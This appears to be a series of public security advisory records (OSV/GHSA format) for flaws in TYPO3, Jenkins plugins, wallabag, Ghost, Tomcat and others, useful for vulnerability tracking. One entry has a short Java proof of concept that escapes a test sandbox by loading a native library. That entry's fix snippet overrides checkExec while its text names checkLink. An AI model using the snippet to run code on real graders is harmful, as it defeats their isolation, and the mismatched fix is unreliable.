the PHP setting [**`cgi.fix_pathinfo=1`**](https://www.php.net/manual/en/ini.core.php#ini.cgi.fix-pathinfo) is used, which is the default PHP setting. In case this setting is not enabled, an exception is thrown to avoid continuing with invalid path information. For websites that cannot be patched timely the TypoScript setting [`config.absRefPrefix`](https://docs.typo3.org/m/typo3/reference-typoscript/main/en-us/Setup/Config/Index.html#absrefprefix) at least should be set to a static path value, instead of using `auto` - e.g. `config.absRefPrefix=/` - this **does not fix all aspects of the vulnerability**, and is just considered to be an intermediate mitigation to the most prominent manifestation. ### References * [TYPO3-CORE-SA-2023-001](https://typo3.org/security/advisory/typo3-core-sa-2023-001) * [TYPO3-CORE-PSA-2023-001](https://typo3.org/security/advisory/typo3-psa-2023-001) *pre-announcement*
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.2.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.5.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.36'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.40'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.7.0'}, {'fixed': '8.7.51'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.35'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.5.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.2.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-r4f8-f93x-5qh3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24814'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/commit/0005a6fd86ab97eff8bf2e3a5828bf0e7cb6263a'}, {'type': 'WEB', 'url': 'https://docs.typo3.org/m/typo3/reference-typoscript/main/en-us/Setup/Config/Index.html#absrefprefix'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2023-24814.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/blob/v11.5.22/typo3/sysext/core/Classes/Utility/GeneralUtility.php#L2481-L2484'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/blob/v11.5.22/typo3/sysext/frontend/Classes/Controller/TypoScriptFrontendController.php#L2547-L2549'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2023-001'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-psa-2023-001'}]
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T21:33:24Z', 'nvd_published_at': '2023-02-07T19:15:00Z'}
1.4.0
GHSA-98hq-4wmw-98w9
2023-02-10T23:52:13Z
2023-02-10T23:52:13Z
null
[]
Arbitrary code execution in de.tum.in.ase:artemis-java-test-sandbox
### Summary Because of the missing `checkLink(String)` override in the SecurityManager, students can load libraries and execute arbitrary code. ### Details Using `System.load(String)` or `System.loadLibrary​(String)` students can load and execute arbitrary code. ```java private static native void start(List<String> args); public static void main(String[] args) { System.load(new File("path_to_lib.so").getAbsolutePath()); start(List.of(args)); } ``` Adding this to the security manager (and a translation) should fix the issue: ```java @Override public void checkExec(String cmd) { try { if (enterPublicInterface()) return; throw new SecurityException(localized("security.error_link")); //$NON-NLS-1$ } finally { exitPublicInterface(); } } ``` ### PoC See details. ### Impact Arbitrary code execution.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'de.tum.in.ase:artemis-java-test-sandbox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/ls1intum/Ares/security/advisories/GHSA-98hq-4wmw-98w9'}, {'type': 'PACKAGE', 'url': 'https://github.com/ls1intum/Ares'}]
{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T23:52:13Z', 'nvd_published_at': None}
1.4.0
GHSA-ph74-8rgx-64c5
2023-02-23T21:31:42Z
2023-02-15T15:30:41Z
null
['CVE-2023-25761']
Cross-site Scripting in Jenkins JUnit Plugin
Jenkins JUnit Plugin 1166.va_436e268e972 and earlier does not escape test case class names in JavaScript expressions, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control test case class names in the JUnit resources processed by the plugin.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:junit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1166.va'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25761'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-3032'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/02/15/4'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:24:22Z', 'nvd_published_at': '2023-02-15T14:15:00Z'}
1.4.0
GHSA-mrqx-mjc4-vfh3
2023-02-02T19:27:16Z
2023-02-02T19:26:47Z
null
['CVE-2023-0610']
wallabag subject to Improper Authorization via annotations
### Impact The annotations feature lets users add annotations on highlighted parts of an entry. The controller does not validate authorization on `PUT` and `DELETE` requests which lets a logged user modify or delete any annotation using their ID on their endpoints `example.org/annotations/{id}`. These vulnerable requests also disclose highlighted parts of the entry to the attacker. You should immediately patch your instance to version 2.5.3 or higher if you have more than one user and/or having open registration. ### Resolution A user check is now done in the vulnerable methods before applying change on an annotation. The Annotation retrieval through a `ParamConverter` has also been replaced with a call to the `AnnotationRepository` in order to prevent any information disclosure through response discrepancy. ### Workarounds ### Credits We would like to thank @bAuh0lz for reporting this issue through huntr.dev. Reference: https://huntr.dev/bounties/8fdd9b31-d89b-4bbe-9557-20b960faf926/
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-beta.1'}, {'fixed': '2.5.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/security/advisories/GHSA-mrqx-mjc4-vfh3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0610'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/5ac6b6bff9e2e3a87fd88c2904ff3c6aac40722e'}, {'type': 'PACKAGE', 'url': 'https://github.com/wallabag/wallabag'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/8fdd9b31-d89b-4bbe-9557-20b960faf926'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T19:26:47Z', 'nvd_published_at': None}
1.4.0
GHSA-p4g4-wgrh-qrg2
2023-06-13T23:48:33Z
2023-02-07T22:59:30Z
null
['CVE-2020-15106']
Panic due to malformed WALs in go.etcd.io/etcd
### Vulnerability type Data Validation ### Detail The size of a record is stored in the length field of a WAL file and no additional validation is done on this data. Therefore, it is possible to forge an extremely large frame size that can unintentionally panic at the expense of any RAFT participant trying to decode the WAL. ### References Find out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf) ### For more information If you have any questions or comments about this advisory: * Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/etcd-io/etcd/wal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.10'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'go.etcd.io/etcd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0-alpha.5.0.20200423152442-f4b650b51dc4'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/security/advisories/GHSA-p4g4-wgrh-qrg2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15106'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/pull/11793'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/commit/4571e528f49625d3de3170f219a45c3b3d38c675'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/commit/f4b650b51dc4a53a8700700dc12e1242ac56ba07'}, {'type': 'PACKAGE', 'url': 'https://github.com/etcd-io/etcd'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0005'}]
{'cwe_ids': ['CWE-20'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T22:59:30Z', 'nvd_published_at': '2020-08-05T19:15:00Z'}
1.4.0
GHSA-47p5-p3jw-w78w
2023-03-03T00:02:15Z
2023-02-17T18:30:23Z
null
['CVE-2021-33926']
Server-Side Request Forgery in Plone CMS
An issue in Plone CMS allows attacker to access sensitive information via the RSS feed protlet.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3'}, {'fixed': '5.2.5'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33926'}, {'type': 'PACKAGE', 'url': 'https://github.com/plone/Plone'}, {'type': 'WEB', 'url': 'https://github.com/s-kustm/Subodh/blob/master/Plone%205.2.4%20Vulnerable%20to%20bilend%20SSRF.pdf'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/blind-ssrf-via-feedparser-accessing-an-internal-url'}]
{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T20:50:53Z', 'nvd_published_at': '2023-02-17T18:15:00Z'}
1.4.0
GHSA-r2h5-3hgw-8j34
2023-02-17T20:51:24Z
2023-02-17T20:51:24Z
null
[]
User data in TPM attestation vulnerable to MITM
### Impact Attestation *user data* (such as the digest of the public key in an aTLS connection) was bound to the issuer's TPM, but not to its PCR state. An attacker could intercept a node initialization, initialize the node themselves, and then impersonate an uninitialized node to the validator. In practice, this meant that a CSP insider with sufficient privileges would have been able to join a node under their control to a Constellation cluster. ### Patches The issue has been patched in [v2.5.2](https://github.com/edgelesssys/constellation/releases/tag/v2.5.2). ### Workarounds none
[]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/edgelesssys/constellation/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.5.1'}}]
[{'type': 'WEB', 'url': 'https://github.com/edgelesssys/constellation/security/advisories/GHSA-r2h5-3hgw-8j34'}, {'type': 'PACKAGE', 'url': 'https://github.com/edgelesssys/constellation'}, {'type': 'WEB', 'url': 'https://github.com/edgelesssys/constellation/releases/tag/v2.5.2'}]
{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T20:51:24Z', 'nvd_published_at': None}
1.4.0
GHSA-9fh3-j99m-f4v7
2023-03-03T23:31:11Z
2023-02-24T00:30:17Z
null
['CVE-2022-36231']
Code injection in pdf_info
pdf_info 0.5.3 is vulnerable to Command Execution. An attacker using a specially crafted payload may execute OS commands by using command chaining because during object initalization there is no validation performed and the user provided path is used.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'pdf_info'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.5.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-36231'}, {'type': 'WEB', 'url': 'https://github.com/newspaperclub/pdf_info/issues/16'}, {'type': 'WEB', 'url': 'https://github.com/newspaperclub/pdf_info/pull/15'}, {'type': 'WEB', 'url': 'https://github.com/affix/CVE-2022-36231'}, {'type': 'PACKAGE', 'url': 'https://github.com/newspaperclub/pdf_info'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/pdf_info/CVE-2022-36231.yml'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/pdf_info'}]
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T00:33:27Z', 'nvd_published_at': '2023-02-23T22:15:00Z'}
1.4.0
GHSA-vjxx-jgcx-9fq2
2023-03-01T01:48:56Z
2023-02-18T03:30:17Z
null
['CVE-2023-0901']
Pixelfed allows user enumeration via reset password functionality
Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository pixelfed/pixelfed 0.11.4 and prior.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'pixelfed/pixelfed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.11.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0901'}, {'type': 'WEB', 'url': 'https://github.com/pixelfed/pixelfed/commit/5b5f5bc38ca9ba39d0b7dacc3813fb899f71ba57'}, {'type': 'PACKAGE', 'url': 'https://github.com/pixelfed/pixelfed'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0327b1b2-6e7c-4154-a307-15f236571010'}]
{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:04:32Z', 'nvd_published_at': '2023-02-18T01:15:00Z'}
1.4.0
GHSA-c2rc-8m9f-g4fh
2023-03-06T01:45:11Z
2023-02-28T03:30:18Z
null
['CVE-2023-1081']
Microweber Cross-site Scripting vulnerability
Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber 1.3.2 and prior. A patch is available and anticipated to be part of version 1.3.3.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'microweber/microweber'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1081'}, {'type': 'WEB', 'url': 'https://github.com/microweber/microweber/commit/29d418461d8407688f2720e7b4be915e03fc16c1'}, {'type': 'PACKAGE', 'url': 'https://github.com/microweber/microweber'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cf59deed-9d43-4552-acfd-43f38f3aabba'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T23:31:01Z', 'nvd_published_at': '2023-02-28T02:15:00Z'}
1.4.0
GHSA-crh5-vv2v-c82q
2023-02-22T00:09:19Z
2023-02-21T00:30:20Z
null
['CVE-2021-32850']
@claviska/jquery-minicolors vulnerable to Cross-site Scripting
jQuery MiniColors is a color picker built on jQuery. Prior to version 2.3.6, jQuery MiniColors is prone to cross-site scripting when handling untrusted color names. This issue is patched in version 2.3.6.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': '@claviska/jquery-minicolors'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32850'}, {'type': 'WEB', 'url': 'https://github.com/claviska/jquery-minicolors/commit/ef134824a7f4110ada53ea6c173111a4fa2f48f3'}, {'type': 'WEB', 'url': 'https://codepen.io/webbiesdk/pen/oNBQNNV'}, {'type': 'PACKAGE', 'url': 'https://github.com/claviska/jquery-minicolors'}, {'type': 'WEB', 'url': 'https://github.com/claviska/jquery-minicolors/releases/tag/2.3.6'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MC5HV4ESLV2E23YGHNJ542QEZBH6YE2F/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDXBWA54A7D6HMR2TN5BAYNCU7HO2PUO/'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-1045_jQuery_MiniColors_Plugin/'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.215306'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.215306'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:09:19Z', 'nvd_published_at': '2023-02-20T22:15:00Z'}
1.4.0
GHSA-g3vf-47fv-8f3c
2023-08-16T21:39:51Z
2023-08-11T15:30:46Z
null
['CVE-2021-26505']
MrSwitch hello.js vulnerable to prototype pollution
A prototype pollution vulnerability in MrSwitch hello.js prior to version 1.18.8 allows remote attackers to execute arbitrary code via `hello.utils.extend` function.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'hellojs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.8'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26505'}, {'type': 'WEB', 'url': 'https://github.com/MrSwitch/hello.js/issues/634'}, {'type': 'WEB', 'url': 'https://github.com/MrSwitch/hello.js/commit/7ab50aeff2d41991f08d4ad6c0481125eea8f6b7'}, {'type': 'PACKAGE', 'url': 'https://github.com/MrSwitch/hello.js'}]
{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T22:08:41Z', 'nvd_published_at': None}
1.4.0
GHSA-mq4v-6vg4-796c
2023-08-21T19:33:04Z
2023-08-11T09:30:36Z
null
['CVE-2023-39553']
apache-airflow-providers-apache-drill Improper Input Validation vulnerability
Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Drill Provider. Apache Airflow Drill Provider is affected by a vulnerability that allows an attacker to pass in malicious parameters when establishing a connection with DrillHook giving an opportunity to read files on the Airflow server. This issue affects Apache Airflow Drill Provider before 2.4.3. It is recommended to upgrade to a version that is not affected.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-apache-drill'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39553'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/33074'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/commit/394a727ac2c18d58978bf186a7a92923460ec110'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2023-136.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/ozpl0opmob49rkcz8svo8wkxyw1395sf'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/11/1'}]
{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T22:01:37Z', 'nvd_published_at': None}
1.4.0
GHSA-6xjj-v76v-fwpj
2023-08-11T21:56:52Z
2023-08-11T09:30:36Z
null
['CVE-2023-4107']
Mattermost does not validate requesting user permissions before updating admin details
Mattermost fails to properly validate the requesting user permissions when updating a system admin, allowing a user manager to update a system admin's details such as email, first name and last name.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.8.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.8.7'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.9.0'}, {'fixed': '7.9.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.9.5'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.10.0'}, {'fixed': '7.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.10.3'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4107'}, {'type': 'PACKAGE', 'url': 'https://github.com/mattermost/mattermost'}, {'type': 'WEB', 'url': 'https://mattermost.com/security-updates'}]
{'cwe_ids': ['CWE-284', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T21:56:52Z', 'nvd_published_at': None}
1.4.0
GHSA-gq5f-xv48-2365
2023-08-30T12:59:50Z
2023-08-22T21:30:26Z
null
['CVE-2022-44729']
Apache XML Graphics Batik Server-Side Request Forgery vulnerability
Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache XML Graphics Batik.This issue affects Apache XML Graphics Batik: 1.16. On version 1.16, a malicious SVG could trigger loading external resources by default, causing resource consumption or in some cases even information disclosure. Users are recommended to upgrade to version 1.17 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.xmlgraphics:batik-bridge'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.17'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.xmlgraphics:batik-svgrasterizer'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.17'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.xmlgraphics:batik-transcoder'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.17'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-44729'}, {'type': 'WEB', 'url': 'https://github.com/apache/xmlgraphics-batik/commit/85b3457d9902f64d5d409a8da060d5ba47d0b69b'}, {'type': 'WEB', 'url': 'https://github.com/apache/xmlgraphics-batik/commit/aaa1dd3e6b5a7df781d73e0c37a1df6a8f318893'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/xmlgraphics-batik'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/BATIK-1349'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/hco2nw1typoorz33qzs0fcdx0ws6d6j2'}, {'type': 'WEB', 'url': 'https://xmlgraphics.apache.org/security.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/22/2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/22/4'}]
{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T17:53:44Z', 'nvd_published_at': None}
1.4.0
GHSA-jg35-vf67-gg2j
2023-08-16T21:05:51Z
2023-08-16T15:30:18Z
null
['CVE-2023-40346']
Jenkins Shortcut Job Plugin stored cross-site scripting vulnerability
Jenkins Shortcut Job Plugin 0.4 and earlier does not escape the shortcut redirection URL. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure shortcut jobs. Shortcut Job Plugin 0.5 escapes the shortcut redirection URL.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:shortcut-job'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40346'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3071'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:05:51Z', 'nvd_published_at': None}
1.4.0
GHSA-9c9v-w225-v5rg
2023-08-23T17:19:50Z
2023-08-15T20:35:20Z
null
['CVE-2023-40028']
Ghost vulnerable to arbitrary file read via symlinks in content import
### Impact A vulnerability in Ghost allows authenticated users to upload files which are symlinks. This can be exploited to perform an arbitrary file read of any file on the operating system. Site administrators can check for exploitation of this issue by looking for unknown symlinks within Ghost's `content/` folder ### Vulnerable versions This security vulnerability is present in Ghost ≤ v5.59.0. ### Patches v5.59.1 contains a fix for this issue. ### For more information If you have any questions or comments about this advisory: * Email us at [security@ghost.org](mailto:security@ghost.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'ghost'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.59.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/security/advisories/GHSA-9c9v-w225-v5rg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40028'}, {'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/commit/690fbf3f7302ff3f77159c0795928bdd20f41205'}, {'type': 'PACKAGE', 'url': 'https://github.com/TryGhost/Ghost'}]
{'cwe_ids': ['CWE-22', 'CWE-59'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T20:35:20Z', 'nvd_published_at': None}
1.4.0
GHSA-q3mw-pvr8-9ggc
2023-08-31T18:50:44Z
2023-08-25T21:30:48Z
null
['CVE-2023-41080']
Apache Tomcat Open Redirect vulnerability
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92. The vulnerability is limited to the ROOT (default) web application.
